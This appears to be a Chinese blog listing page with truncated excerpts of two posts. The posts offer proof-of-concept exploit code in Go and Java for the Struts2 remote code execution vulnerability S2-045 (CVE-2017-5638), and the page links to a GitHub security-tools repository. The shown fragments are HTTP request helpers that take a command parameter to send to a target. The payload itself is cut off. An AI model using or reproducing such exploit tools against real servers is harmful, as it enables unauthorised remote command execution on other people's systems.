其实Struts2代码执行原理很简单, 再来一个golang版的 , 不用怀疑, 我写这么多版本其实就是用来搞笑的
package main
import (
"fmt"
"os"
"net/http"
"io/ioutil"
"strings"
)
func httpGet(url, commend string) (result string) {
var ret string
if "http" != substr(url, 0 , 4) {
url = "http://" + url
}
resp, err := http.Get(url)
if err != nil {
ret = "网站无法正常打开!"
}
defer resp.Body.Clo...
S2-045 for golang, Struts2爆远程代码执行漏洞阅读全文
https://github.com/Mofree/SecurityTools/tree/master/script
package demo;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
public class Stpoc {
public Stpoc() {
}
public static String getContext(URL url, String encode, String commend) {
StringBuffer contentBuffe...
CVE-2017-5638, S2-045, Struts2爆远程代码执行漏洞阅读全文